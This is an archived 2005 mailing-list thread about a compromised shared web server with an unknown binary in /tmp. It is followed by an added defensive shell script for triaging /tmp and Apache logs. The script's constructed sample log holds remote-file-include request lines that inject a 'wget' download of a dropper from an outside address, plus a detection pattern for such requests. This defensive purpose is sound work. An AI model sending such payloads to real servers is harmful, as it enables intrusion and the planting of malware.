Blackhole

Justin Zygmont jzygmont at solarflow.net
Mon Apr 11 20:19:51 UTC 2005


You may not have to reinstall the whole system, /tmp is likely the only 
directory that was writable through an exploit.  What does the program do, 
is it a DDoS attack program?


On Mon, 11 Apr 2005, Chris Kenward wrote:

> Hi Mike
>
>> Perhaps this will help to identify the file:
>
>> http://www.packetstormsecurity.org/0209-exploits/free-apache.txt
>> http://mx.mcafee.com/virusInfo/default.asp?id=description&virus_k=100670
>
>> If your machine has been compromised, the best thing to do is to
>> format and re-install, taking care not to open the same security
>> hole that allowed the first compromise.
>
> Many thanks. The web server has more than 200 websites on it, which is going
> to make it exceedingly difficult to track which of those allowed the attack.
> The server has only recently been rebuilt, at the cost of lots of stress
> while our customers whinged about their sites not being there, and I'm
> pretty loath to go through that all again.
>
> There is mention in the link above regarding directories called:
> /tmp/.blackhole.c
>
> There isn't a directory called .blackhole.c on the server - just the one
> executable binary in the /tmp folder. I can't find anything else on the
> server which looks as though someone has had root access to the machine but
> there again I'm no Linux expert so it could be staring me in the face.
>
> Is there an "easy" way to track how this person got into the server? I
> notice that the latest update for PHP from the RHN is 4.3.2 and I understand
> from searches I've done on the 'net that 4.3.10 or even the latest 4.3.11 is
> urgently advised due to "holes" in earlier versions. Not sure, however,
> whether this is how the person managed to drop that on the server.
>
> Regards
> Chris
>
>
>

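As an added triage example (not code from the thread or from either poster), the two checks that usually answer Chris's "how did they get in" question on a shared web host: inventory the executable or hidden files in the world-writable directory, then search the Apache access logs for the request whose query string carried a remote URL or a download command, since a dropper that lands in /tmp as the web server user is normally fetched that way. The log lines, file names and addresses below are constructed; the function names are this example's own.

```shell
#!/bin/sh
# Added triage helper, not from the thread: given a web server with an unknown
# binary in /tmp, (1) list executable or hidden files in the world-writable
# directory and (2) search an Apache combined access log for the request that
# fetched the dropper. All sample data below is constructed.

# Print each regular file under DIR that is executable or a dot-file, with
# owner and mtime, so it can be lined up against the web logs' timestamps.
list_tmp_suspects() {
    find "$1" -type f \( -perm -u+x -o -name '.*' \) -exec ls -ld {} \;
}

# Print log lines whose query string carries a remote URL (plain or
# URL-encoded, the remote-file-include pattern), a download tool, or /tmp.
suspicious_requests() {
    grep -E -i '\?[^" ]*(https?(%3a|:)(%2f|/){2}|ftp(%3a|:)|wget|curl|/tmp/)' "$1"
}

# Number of matching lines (prints 0 rather than failing when none match).
count_suspicious() {
    n=$(suspicious_requests "$1" | wc -l)
    echo $((n + 0))
}

# Unique client addresses behind the suspicious requests: the pivot for
# grepping the other virtual hosts' logs for the same source.
suspicious_sources() {
    suspicious_requests "$1" | awk '{print $1}' | sort -u
}

# --- constructed sample data (removed on exit) -----------------------------
SAMPLE_DIR=$(mktemp -d)
SAMPLE_LOG=$(mktemp)
trap 'rm -rf "$SAMPLE_DIR" "$SAMPLE_LOG"' EXIT

printf 'harmless\n' > "$SAMPLE_DIR/notes.txt"                        # plain file, not listed
printf '#!/bin/sh\n' > "$SAMPLE_DIR/bh"; chmod 755 "$SAMPLE_DIR/bh"  # dropped executable
printf 'int main(){}\n' > "$SAMPLE_DIR/.bh.c"                        # hidden source file

cat > "$SAMPLE_LOG" <<'EOF'
192.0.2.10 - - [11/Apr/2005:02:13:44 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
198.51.100.7 - - [11/Apr/2005:02:14:02 +0000] "GET /index.php?page=http%3A%2F%2F203.0.113.5%2Fcmd.txt%3F HTTP/1.1" 200 812 "-" "Mozilla/4.0"
198.51.100.7 - - [11/Apr/2005:02:14:09 +0000] "GET /index.php?page=http://203.0.113.5/cmd.txt&cmd=cd%20/tmp;wget%20http://203.0.113.5/bh HTTP/1.1" 200 1450 "-" "Mozilla/4.0"
192.0.2.11 - - [11/Apr/2005:02:15:01 +0000] "POST /contact.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"
EOF

echo "== suspect files in $SAMPLE_DIR =="
list_tmp_suspects "$SAMPLE_DIR"
echo "== suspicious requests =="
suspicious_requests "$SAMPLE_LOG"
echo "== sources =="
suspicious_sources "$SAMPLE_LOG"
```

On a real host, point `list_tmp_suspects` at /tmp (and /var/tmp, /dev/shm) and `suspicious_requests` at each virtual host's access log; the log line whose timestamp sits just before the dropped binary's mtime, and whose script path identifies the vulnerable site, is the one to look at. The pattern is deliberately broad and will produce false positives on sites that legitimately pass URLs in query strings, so it narrows the search rather than proves the entry point.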


